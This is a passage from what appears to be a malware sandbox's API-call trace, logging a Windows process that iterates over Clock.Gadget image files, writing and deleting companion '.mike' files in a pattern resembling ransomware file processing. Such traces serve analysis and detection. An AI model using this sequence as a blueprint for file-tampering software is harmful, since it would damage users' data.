lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", lpFilePart=0x0) returned 0x59 [0103.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0103.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0103.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", lpFilePart=0x0) returned 0x59 [0103.526] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_rest.png.mike")) returned 1 [0103.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0103.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0103.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0103.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0103.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0103.530] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0103.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.531] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", lpFilePart=0x0) returned 0x57 [0103.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.531] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png", lpFilePart=0x0) returned 0x52 [0103.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0103.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0103.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.532] WriteFile (in: hFile=0x288, lpBuffer=0x212e988*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x212e988*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0103.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0103.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0103.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0103.533] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.535] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", lpFilePart=0x0) returned 0x57 [0103.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.535] WriteFile (in: hFile=0x288, lpBuffer=0x2132e2c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2132e2c*, lpNumberOfBytesWritten=0x2af074*=0x120, lpOverlapped=0x0) returned 1 [0103.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0103.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0103.536] WriteFile (in: hFile=0x288, lpBuffer=0x2136080*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2136080*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.537] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", lpFilePart=0x0) returned 0x57 [0103.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.537] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", lpFilePart=0x0) returned 0x57 [0103.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png", dwFileAttributes=0x80) returned 0 [0103.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png", lpFilePart=0x0) returned 0x52 [0103.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", lpFilePart=0x0) returned 0x57 [0103.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0103.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0103.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike", lpFilePart=0x0) returned 0x57 [0103.539] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\spacer_highlights.png.mike")) returned 1 [0103.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0103.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0103.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0103.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0103.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0103.542] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0103.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.543] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", lpFilePart=0x0) returned 0x4c [0103.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.544] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png", lpFilePart=0x0) returned 0x47 [0103.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0103.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0103.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.544] WriteFile (in: hFile=0x288, lpBuffer=0x213b250*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x213b250*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0103.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0103.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0103.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0103.546] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.549] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", lpFilePart=0x0) returned 0x4c [0103.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0103.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0103.550] SetFilePointer (in: hFile=0x288, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0103.550] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", lpFilePart=0x0) returned 0x4c [0103.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0103.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0103.552] WriteFile (in: hFile=0x288, lpBuffer=0x215cc00*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x215cc00*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.553] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", lpFilePart=0x0) returned 0x4c [0103.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.553] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", lpFilePart=0x0) returned 0x4c [0103.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png", dwFileAttributes=0x80) returned 0 [0103.554] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png", lpFilePart=0x0) returned 0x47 [0103.555] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", lpFilePart=0x0) returned 0x4c [0103.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0103.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0103.555] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike", lpFilePart=0x0) returned 0x4c [0103.555] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square.png.mike")) returned 1 [0103.556] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", lpFilePart=0x0) returned 0x4b [0103.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0103.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0103.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0103.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0103.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0103.559] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0103.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", lpFilePart=0x0) returned 0x4b [0103.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", lpFilePart=0x0) returned 0x4b [0103.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0103.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0103.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.561] WriteFile (in: hFile=0x288, lpBuffer=0x2161d30*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2161d30*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0103.562] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.563] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.564] WriteFile (in: hFile=0x288, lpBuffer=0x21660ec*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21660ec*, lpNumberOfBytesWritten=0x2af074*=0xf0, lpOverlapped=0x0) returned 1 [0103.565] WriteFile (in: hFile=0x288, lpBuffer=0x2169324*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2169324*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.565] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.566] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", dwFileAttributes=0x80) returned 0 [0103.567] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png", lpFilePart=0x0) returned 0x4b [0103.567] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.567] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike", lpFilePart=0x0) returned 0x50 [0103.567] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_dot.png.mike")) returned 1 [0103.568] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png", lpFilePart=0x0) returned 0x49 [0103.570] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.570] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.570] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png", lpFilePart=0x0) returned 0x49 [0103.571] WriteFile (in: hFile=0x288, lpBuffer=0x216e46c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x216e46c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.572] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.573] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.574] WriteFile (in: hFile=0x288, lpBuffer=0x2172f74*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2172f74*, lpNumberOfBytesWritten=0x2af074*=0x1e0, lpOverlapped=0x0) returned 1 [0103.575] WriteFile (in: hFile=0x288, lpBuffer=0x21761a4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21761a4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.575] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.576] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.576] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png", dwFileAttributes=0x80) returned 0 [0103.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png", lpFilePart=0x0) returned 0x49 [0103.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike", lpFilePart=0x0) returned 0x4e [0103.577] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\square_h.png.mike")) returned 1 [0103.578] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png", 